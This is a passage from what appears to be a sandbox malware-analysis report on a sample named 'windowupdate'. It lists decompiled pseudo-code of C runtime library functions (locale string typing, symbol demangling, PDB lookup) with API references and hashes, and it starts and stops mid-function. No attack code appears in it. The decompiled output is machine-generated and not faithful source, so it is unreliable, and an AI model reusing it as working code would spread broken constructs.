				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				char _v52;
				char _v68;
				signed int _t61;
				void* _t64;
				intOrPtr _t88;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;

				_t123 = __edi;
				L00D66CC0(__ebx,  &_v68, __esi, _a4);
				if(_a24 == 0) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v68))) + 8));
				} else {
					_v16 = _a24;
				}
				_v28 = _v16;
				if(_a28 == 0) {
					_v20 = 1;
				} else {
					_v20 = 9;
				}
				_t61 = E00DA0990(_v28, _v20, _a12, _a16, 0, 0);
				_t126 = _t125 + 0x18;
				_v12 = _t61;
				if(_v12 != 0) {
					_t64 = E00DA5110(_v12 << 1);
					_t127 = _t126 + 4;
					if(_t64 == 0) {
						_v24 = 0;
					} else {
						_t88 = E00DA5140(E00D89580(E00DA5110(_v12 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\getstringtypea.cpp", 0x51), 0xdddd);
						_t127 = _t127 + 0x1c;
						_v24 = _t88;
					}
					E00DA5090( &_v8,  *((intOrPtr*)(E00DA50B0( &_v52, _v24))));
					if(E00DA50F0( &_v8) != 0) {
						E00D4AF80(_t123, E00DA50F0( &_v8), 0, _v12 << 1);
						_v32 = E00DA0990(_v28, 1, _a12, _a16, E00DA50F0( &_v8), _v12);
						if(_v32 != 0) {
							_v48 = GetStringTypeW(_a8, E00DA50F0( &_v8), _v32, _a20);
							E00DA50D0( &_v8);
							E00D67230( &_v68);
							return _v48;
						}
						_v44 = 0;
						E00DA50D0( &_v8);
						E00D67230( &_v68);
						return _v44;
					} else {
						_v40 = 0;
						E00DA50D0( &_v8);
						E00D67230( &_v68);
						return _v40;
					}
				} else {
					_v36 = 0;
					E00D67230( &_v68);
					return _v36;
				}
			}























                      0x00da5170
                      0x00da517f
                      0x00da5188
                      0x00da519f
                      0x00da518a
                      0x00da518d
                      0x00da518d
                      0x00da51a5
                      0x00da51ac
                      0x00da51b7
                      0x00da51ae
                      0x00da51ae
                      0x00da51ae
                      0x00da51d2
                      0x00da51d7
                      0x00da51da
                      0x00da51e1
                      0x00da5200
                      0x00da5205
                      0x00da520a
                      0x00da523f
                      0x00da520c
                      0x00da5232
                      0x00da5237
                      0x00da523a
                      0x00da523a
                      0x00da5258
                      0x00da5267
                      0x00da5299
                      0x00da52c4
                      0x00da52cb
                      0x00da5304
                      0x00da530a
                      0x00da5312
                      0x00000000
                      0x00da5317
                      0x00da52cd
                      0x00da52d7
                      0x00da52df
                      0x00000000
                      0x00da5269
                      0x00da5269
                      0x00da5273
                      0x00da527b
                      0x00000000
                      0x00da5280
                      0x00da51e3
                      0x00da51e3
                      0x00da51ed
                      0x00000000
                      0x00da51f2

                      APIs
                      • __wcstombs_l.LIBCMTD ref: 00DA5229
                      • __MarkAllocaS.LIBCMTD ref: 00DA5232
                        • Part of subcall function 00DA0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 00DA09C3
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA524D
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA5258
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA5273
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA52D7
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00DA52FE
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA530A
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00DA5213
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                      • API String ID: 2378836076-24854585
                      • Opcode ID: 546a2cdc6abbc5f5a50bbfece76affbe06e80441fe96f6282b7697e53c0fcee0
                      • Instruction ID: 1f6d402e651ba25b84c58700c2847aa11c0101f05929f6874a0817521bb89655
                      • Opcode Fuzzy Hash: 546a2cdc6abbc5f5a50bbfece76affbe06e80441fe96f6282b7697e53c0fcee0
                      • Instruction Fuzzy Hash: 3F5148B1910608EBDB04EFA4D892BEEB774FF55300F504158F502AB285EB34AE05CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D54380 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D54380(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				char _v48;
				void* _t43;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr _t70;
				intOrPtr _t71;

				E00D4F2A0( &_v16, _a8);
				_t56 =  *0xf20640; // 0x0
				_v8 =  *_t56;
				if(_v8 == 0) {
					E00D4FB00(__eflags, _a4, 1,  &_v16);
					return _a4;
				}
				if(_v8 == 0x3f) {
					_t58 =  *0xf20640; // 0x0
					 *0xf20640 = _t58 + 1;
					E00D4F820( &_v16, E00D53A20(__ebx, __edi, __esi,  &_v48,  &_v16, 0, E00D4F3F0( &_v40), 0));
					E00D56AB0(__ebx, __edi, __esi, _a4,  &_v16);
					return _a4;
				}
				if(_v8 == 0x58) {
					_t70 =  *0xf20640; // 0x0
					_t71 = _t70 + 1;
					 *0xf20640 = _t71;
					_t43 = E00D5A560( &_v16);
					__eflags = _t43;
					if(_t43 == 0) {
						_v32 = E00D50060("void ", 5);
						_v28 = _t71;
						E00D4FAA0(_a4,  &_v32,  &_v16);
						return _a4;
					}
					_v24 = E00D50060("void", 4);
					_v20 = _t71;
					E00D4F1F0(_a4,  &_v24);
					return _a4;
				}
				E00D56AB0(__ebx, __edi, __esi, _a4,  &_v16);
				return _a4;
			}
















                      0x00d5438d
                      0x00d54392
                      0x00d5439a
                      0x00d543a1
                      0x00d543c2
                      0x00000000
                      0x00d543ca
                      0x00d543a7
                      0x00d54446
                      0x00d5444f
                      0x00d54476
                      0x00d54483
                      0x00000000
                      0x00d5448b
                      0x00d543b1
                      0x00d543d2
                      0x00d543d8
                      0x00d543db
                      0x00d543e4
                      0x00d543e9
                      0x00d543eb
                      0x00d54427
                      0x00d5442a
                      0x00d54439
                      0x00000000
                      0x00d54441
                      0x00d543fc
                      0x00d543ff
                      0x00d54409
                      0x00000000
                      0x00d5440e
                      0x00d544a9
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D5438D
                        • Part of subcall function 00D4F2A0: pDNameNode::pDNameNode.LIBCMTD ref: 00D4F2DA
                      • operator+.LIBVCRUNTIMED ref: 00D543C2
                      • DName::isEmpty.LIBCMTD ref: 00D543E4
                        • Part of subcall function 00D56AB0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D56AB9
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5445A
                      • Mailbox.LIBCMTD ref: 00D54476
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
                      • String ID: X$void$void
                      • API String ID: 3628514644-1260697050
                      • Opcode ID: 6acd83eabaeda4de42aaaf9380cdd654c8c137b97da3c700eaba9d1732f72b67
                      • Instruction ID: 4cd5d3c04aebe731adca30f408764bfa55082e0044a98ec2746f3ccc14aebd02
                      • Opcode Fuzzy Hash: 6acd83eabaeda4de42aaaf9380cdd654c8c137b97da3c700eaba9d1732f72b67
                      • Instruction Fuzzy Hash: 553183B6D40108ABDF14DF94DC82AEE7BB4EB54305F148158FD056B252EB70AB48DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D59D50 Relevance: 15.1, APIs: 10, Instructions: 130COMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00D59D50(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v5;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char* _t38;
				void* _t51;
				char* _t88;
				void* _t96;
				void* _t97;

				_t95 = __esi;
				_t94 = __edi;
				_t65 = __ebx;
				_t38 =  *0xf20640; // 0x0
				if( *_t38 != 0) {
					E00D58D00(__ebx, __edi, __esi,  &_v20);
					_t97 = _t96 + 4;
					if(E00D5A6C0( &_v20) != 0) {
						E00D4FDE0( &_v20, 0x7b);
						_v5 = 0;
						L5:
						while(1 != 0) {
							if((_v5 & 0x000000ff) != 0) {
								E00D4FDE0( &_v20, 0x2c);
							}
							_t88 =  *0xf20640; // 0x0
							_v12 =  *_t88;
							_v12 = _v12 - 0x32;
							if(_v12 > 0xe) {
								L14:
								E00D4FD40( &_v20, E00D58D00(_t65, _t94, _t95,  &_v52));
								E00D4FDE0( &_v20, 0x3a);
								_t51 = E00D586C0(_t65, _t94, _t95,  &_v60);
								_t97 = _t97 + 8;
								E00D4FD40( &_v20, _t51);
								goto L15;
							} else {
								_t16 = _v12 + 0xd59f18; // 0xcccccc03
								switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M00D59F04))) {
									case 0:
										 *0xf20640 =  *0xf20640 + 1;
										_t58 = E00D59D50(_t65, _t94, _t95,  &_v28);
										_t97 = _t97 + 4;
										E00D4FD40( &_v20, _t58);
										goto L15;
									case 1:
										 *0xf20640 =  *0xf20640 + 1;
										 *0xf20640 =  *0xf20640 + 1;
										__ecx =  &_v36;
										__eax = E00D52860(__ebx, __edi, __esi,  &_v36);
										__ecx =  &_v20;
										__eax = E00D4FD40(__ecx, __eax);
										goto L15;
									case 2:
										 *0xf20640 =  *0xf20640 + 1;
										 &_v44 = E00D580D0(__ebx, __edi, __esi,  &_v44);
										__ecx =  &_v20;
										__eax = E00D4FD40(__ecx, __eax);
										goto L15;
									case 3:
										L15:
										if(E00D5A6C0( &_v20) != 0) {
											_t54 =  *0xf20640; // 0x0
											if( *_t54 != 0x40) {
												_v5 = 1;
												goto L5;
											}
											_t90 =  *0xf20640; // 0x0
											 *0xf20640 = _t90 + 1;
											goto L20;
										}
										E00D4F350(_a4, 2);
										return _a4;
									case 4:
										goto L14;
								}
							}
						}
						L20:
						E00D4FDE0( &_v20, 0x7d);
						E00D4F240(_a4,  &_v20);
						return _a4;
					}
					E00D4F350(_a4, 2);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}
















                      0x00d59d50
                      0x00d59d50
                      0x00d59d50
                      0x00d59d56
                      0x00d59d60
                      0x00d59d78
                      0x00d59d7d
                      0x00d59d8a
                      0x00d59da3
                      0x00d59da8
                      0x00000000
                      0x00d59dac
                      0x00d59dbf
                      0x00d59dc6
                      0x00d59dc6
                      0x00d59dcb
                      0x00d59dd4
                      0x00d59ddd
                      0x00d59de4
                      0x00d59e70
                      0x00d59e80
                      0x00d59e8a
                      0x00d59e93
                      0x00d59e98
                      0x00d59e9f
                      0x00000000
                      0x00d59dea
                      0x00d59ded
                      0x00d59df4
                      0x00000000
                      0x00d59e04
                      0x00d59e0e
                      0x00d59e13
                      0x00d59e1a
                      0x00000000
                      0x00000000
                      0x00d59e29
                      0x00d59e2c
                      0x00d59e31
                      0x00d59e35
                      0x00d59e3e
                      0x00d59e41
                      0x00000000
                      0x00000000
                      0x00d59e51
                      0x00d59e5b
                      0x00d59e64
                      0x00d59e67
                      0x00000000
                      0x00000000
                      0x00d59ea4
                      0x00d59eae
                      0x00d59ebf
                      0x00d59eca
                      0x00d59edd
                      0x00000000
                      0x00d59edd
                      0x00d59ecc
                      0x00d59ed5
                      0x00000000
                      0x00d59ed5
                      0x00d59eb5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d59df4
                      0x00d59de4
                      0x00d59ee6
                      0x00d59eeb
                      0x00d59ef7
                      0x00000000
                      0x00d59efc
                      0x00d59d91
                      0x00000000
                      0x00d59d96
                      0x00d59d67
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D59D67
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::isValid.LIBCMTD ref: 00D59D83
                      • DName::DName.LIBVCRUNTIMED ref: 00D59D91
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 4056879799-0
                      • Opcode ID: d05870a7f144315a8771bc426b74c94ccd5caa209adaba34dedc4db495227a16
                      • Instruction ID: 18e4d5ab2839ba68f5d3017f91f0806b6a1d9837157f4e4e2523030ee7b12b79
                      • Opcode Fuzzy Hash: d05870a7f144315a8771bc426b74c94ccd5caa209adaba34dedc4db495227a16
                      • Instruction Fuzzy Hash: F74166B1904118DBDF14EF50DCA69FEBB74BF50305F044529FC066A1A2EB31AA19DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC20D0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 310memorylibraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E00DC20D0(intOrPtr _a4, short* _a8, char _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed short _v8;
				long _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _MEMORY_BASIC_INFORMATION _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				void* _t81;
				struct HINSTANCE__* _t83;
				void* _t135;
				void* _t139;
				signed int _t140;
				void* _t146;
				void* _t149;
				void* _t151;
				intOrPtr _t155;
				intOrPtr* _t156;
				void* _t174;
				intOrPtr _t181;
				intOrPtr* _t188;
				intOrPtr _t190;
				signed int _t192;
				signed int _t195;
				intOrPtr* _t204;
				void* _t212;
				void* _t214;
				intOrPtr* _t215;
				signed int _t228;

				 *_a16 = 0;
				_t212 = _a4 - 1;
				 *_a8 = 0;
				if(VirtualQuery(_t212,  &_v80, 0x1c) == 0 || E00DC24B0(_v80.AllocationBase, _a20, _a24) == 0) {
					L45:
					return 0;
				} else {
					_t80 = _v80.AllocationBase;
					if( *_t80 != 0x5a4d) {
						goto L45;
					} else {
						_t155 =  *((intOrPtr*)(_t80 + 0x3c));
						if(_t155 <= 0) {
							goto L45;
						} else {
							_t156 = _t155 + _t80;
							if( *_t156 != 0x4550) {
								goto L45;
							} else {
								_t214 = _t212 - _t80;
								_t195 =  *(_t156 + 6) & 0x0000ffff;
								_t190 = ( *(_t156 + 0x14) & 0x0000ffff) + 0x20;
								_t149 = 0;
								_t81 = 0;
								if(_t195 != 0) {
									_t188 = _t156 + _t190;
									do {
										_t190 =  *((intOrPtr*)(_t188 + 4));
										if(_t214 < _t190) {
											goto L9;
										} else {
											_t149 = _t214 - _t190;
											if(_t214 >=  *_t188) {
												goto L9;
											}
										}
										goto L10;
										L9:
										_t81 = _t81 + 1;
										_t188 = _t188 + 0x28;
									} while (_t81 < _t195);
								}
								L10:
								if(_t81 == _t195) {
									goto L45;
								} else {
									_v16 = _t81 + 1;
									if( *0xf237c9 != 0) {
										_t83 =  *0xf237c4;
										goto L16;
									} else {
										if( *0xf237c4 != 0) {
											goto L45;
										} else {
											_t83 = E00DC1C50(_t149, _t190, _t195, _t214);
											 *0xf237c4 = _t83;
											if(_t83 == 0) {
												goto L45;
											} else {
												 *0xf237c9 = 1;
												L16:
												_t215 = GetProcAddress(_t83, "PDBOpenValidate5");
												if(_t215 == 0) {
													goto L45;
												} else {
													 *0xdc62b0(_a20, 0, 0, 0,  &_v52, 0, 0,  &_v28);
													if( *_t215() == 0) {
														goto L45;
													} else {
														_v12 = 0;
														_v40 = 0;
														 *0xdc62b0();
														if( *((intOrPtr*)( *((intOrPtr*)( *_v28))))() == 0x1329141) {
															 *0xdc62b0(0, "r",  &_v36);
															if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() != 0) {
																 *0xdc62b0(_v16, _t149,  &_v24, 0, 0, 0);
																if( *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x20))))() != 0) {
																	 *0xdc62b0( &_v12);
																	if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x68))))() != 0) {
																		_t204 = _v12;
																		if(_t204 != 0) {
																			 *0xdc62b0();
																			if( *((intOrPtr*)( *((intOrPtr*)( *_t204 + 8))))() == 0) {
																				L29:
																				_t174 = 0;
																				goto L30;
																			} else {
																				while(1) {
																					 *0xdc62b0(0,  &_v32,  &_v8,  &_v44,  &_v20, 0);
																					if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))() == 0) {
																						goto L31;
																					}
																					if((_v8 & 0x0000ffff) != _v16) {
																						L28:
																						 *0xdc62b0();
																						if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))() != 0) {
																							continue;
																						} else {
																							goto L29;
																						}
																					} else {
																						_t181 = _v32;
																						if(_t181 > _t149 || _t149 >= _v44 + _t181) {
																							goto L28;
																						} else {
																							_t228 = _v20;
																							if(_t228 == 0 || _t228 >= 0x1fffffff) {
																								goto L31;
																							} else {
																								_t135 = HeapAlloc(GetProcessHeap(), 0, _t228 << 3);
																								_v16 = _t135;
																								if(_t135 == 0) {
																									goto L31;
																								} else {
																									 *0xdc62b0( &_v48, 0, 0, 0,  &_v20, _t135);
																									_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))();
																									_t174 = _v16;
																									if(_t139 == 0) {
																										L30:
																										HeapFree(GetProcessHeap(), 0, _t174);
																										goto L31;
																									} else {
																										_t151 = _t149 - _v32;
																										if(_t151 >=  *_t174) {
																											_t192 = _v20;
																											_t140 = 1;
																											if(_t192 > 1) {
																												while(_t151 >=  *((intOrPtr*)(_t174 + _t140 * 8))) {
																													_t140 = _t140 + 1;
																													if(_t140 < _t192) {
																														continue;
																													}
																													goto L43;
																												}
																											}
																											L43:
																											 *_a16 =  *(_t174 + _t140 * 8 - 4) & 0x00ffffff;
																											 *0xdc62b0(_v48, _a8,  &_a12, 0, 0, 0);
																											_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x70))))();
																											_t174 = _v16;
																											if(_t146 != 0) {
																												_v40 = 1;
																											}
																										}
																										goto L30;
																									}
																									goto L34;
																								}
																							}
																							goto L46;
																						}
																					}
																					goto L31;
																				}
																			}
																			L31:
																			 *0xdc62b0();
																			 *((intOrPtr*)( *((intOrPtr*)( *_v12))))();
																		}
																	}
																	 *0xdc62b0();
																	 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x40))))();
																}
																 *0xdc62b0();
																 *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x38))))();
															}
														}
														L34:
														 *0xdc62b0();
														 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x2c))))();
														return _v40;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L46:
			}









































                      0x00dc20e0
                      0x00dc20e6
                      0x00dc20ed
                      0x00dc20fd
                      0x00dc2447
                      0x00dc244f
                      0x00dc211c
                      0x00dc211c
                      0x00dc2127
                      0x00000000
                      0x00dc212d
                      0x00dc212d
                      0x00dc2132
                      0x00000000
                      0x00dc2138
                      0x00dc2138
                      0x00dc2140
                      0x00000000
                      0x00dc2146
                      0x00dc214a
                      0x00dc214c
                      0x00dc2150
                      0x00dc2153
                      0x00dc2155
                      0x00dc2159
                      0x00dc215b
                      0x00dc2160
                      0x00dc2160
                      0x00dc2165
                      0x00000000
                      0x00dc2167
                      0x00dc2169
                      0x00dc216d
                      0x00000000
                      0x00000000
                      0x00dc216d
                      0x00000000
                      0x00dc216f
                      0x00dc216f
                      0x00dc2170
                      0x00dc2173
                      0x00dc2160
                      0x00dc2177
                      0x00dc2179
                      0x00000000
                      0x00dc217f
                      0x00dc2187
                      0x00dc218a
                      0x00dc21b4
                      0x00000000
                      0x00dc218c
                      0x00dc2193
                      0x00000000
                      0x00dc2199
                      0x00dc2199
                      0x00dc219e
                      0x00dc21a5
                      0x00000000
                      0x00dc21ab
                      0x00dc21ab
                      0x00dc21b9
                      0x00dc21c5
                      0x00dc21c9
                      0x00000000
                      0x00dc21cf
                      0x00dc21e6
                      0x00dc21f3
                      0x00000000
                      0x00dc21f9
                      0x00dc21fc
                      0x00dc2203
                      0x00dc2210
                      0x00dc221f
                      0x00dc223a
                      0x00dc2246
                      0x00dc2264
                      0x00dc2270
                      0x00dc2284
                      0x00dc2290
                      0x00dc2296
                      0x00dc229b
                      0x00dc22a8
                      0x00dc22b4
                      0x00dc2317
                      0x00dc2317
                      0x00000000
                      0x00000000
                      0x00dc22b6
                      0x00dc22d4
                      0x00dc22e0
                      0x00000000
                      0x00000000
                      0x00dc22e9
                      0x00dc22ff
                      0x00dc2309
                      0x00dc2315
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00dc22eb
                      0x00dc22eb
                      0x00dc22f0
                      0x00000000
                      0x00dc2382
                      0x00dc2382
                      0x00dc2387
                      0x00000000
                      0x00dc2391
                      0x00dc239e
                      0x00dc23a4
                      0x00dc23a9
                      0x00000000
                      0x00dc23af
                      0x00dc23c8
                      0x00dc23d0
                      0x00dc23d2
                      0x00dc23d7
                      0x00dc2319
                      0x00dc2323
                      0x00000000
                      0x00dc23dd
                      0x00dc23dd
                      0x00dc23e2
                      0x00dc23e8
                      0x00dc23eb
                      0x00dc23f2
                      0x00dc23f4
                      0x00dc23f9
                      0x00dc23fc
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00dc23fc
                      0x00dc23f4
                      0x00dc23fe
                      0x00dc2411
                      0x00dc2426
                      0x00dc242e
                      0x00dc2430
                      0x00dc2435
                      0x00dc243b
                      0x00dc243b
                      0x00dc2435
                      0x00000000
                      0x00dc23e2
                      0x00000000
                      0x00dc23d7
                      0x00dc23a9
                      0x00000000
                      0x00dc2387
                      0x00dc22f0
                      0x00000000
                      0x00dc22e9
                      0x00dc22b6
                      0x00dc2329
                      0x00dc2332
                      0x00dc233a
                      0x00dc233a
                      0x00dc229b
                      0x00dc2346
                      0x00dc234e
                      0x00dc234e
                      0x00dc235a
                      0x00dc2362
                      0x00dc2362
                      0x00dc2246
                      0x00dc2364
                      0x00dc236e
                      0x00dc2376
                      0x00dc2381
                      0x00dc2381
                      0x00dc21f3
                      0x00dc21c9
                      0x00dc21a5
                      0x00dc2193
                      0x00dc218a
                      0x00dc2179
                      0x00dc2140
                      0x00dc2132
                      0x00dc2127
                      0x00000000

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00D32421,Runtime Check Error. Unable to display RTC Message.), ref: 00DC20F5
                        • Part of subcall function 00DC24B0: GetModuleFileNameW.KERNEL32(00D3241C,?,00DC2111,?,00DC2111,?,00D3241C,00DC1975), ref: 00DC24BF
                      • GetProcAddress.KERNEL32(?,PDBOpenValidate5), ref: 00DC21BF
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DC231C
                      • HeapFree.KERNEL32(00000000), ref: 00DC2323
                      • GetProcessHeap.KERNEL32 ref: 00DC2394
                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00DC239E
                      Strings
                      • PDBOpenValidate5, xrefs: 00DC21B9
                      • Runtime Check Error. Unable to display RTC Message., xrefs: 00DC20DB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$AddressAllocFileFreeModuleNameProcQueryVirtual
                      • String ID: PDBOpenValidate5$Runtime Check Error. Unable to display RTC Message.
                      • API String ID: 3872449310-425978220
                      • Opcode ID: 5a16eed032f1bc5d1cf9b28539694f9c54b191d118be9f4031525b408207ede4
                      • Instruction ID: c5b7fedb5516408f91ff516a8881208caa449ba2ca41417a1426eef7c251f76c
                      • Opcode Fuzzy Hash: 5a16eed032f1bc5d1cf9b28539694f9c54b191d118be9f4031525b408207ede4
                      • Instruction Fuzzy Hash: C4B13A75A0021A9FDF15DBA4C854FBEB7B6FB88710F184059E902E7390DB35ED028BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D8A760 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D8A760(void* __ecx, void* __edi, intOrPtr _a4) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed char _t84;
				intOrPtr _t97;
				intOrPtr _t105;
				char* _t112;
				void* _t116;
				void* _t118;
				void* _t156;
				void* _t159;

				_t156 = __edi;
				_t118 = __ecx;
				if(_a4 != 0) {
					__eflags = _a4 - 2;
					if(_a4 == 2) {
						L5:
						_v28 = 1;
						L6:
						_v32 = _v28;
						__eflags = _v32;
						if(__eflags == 0) {
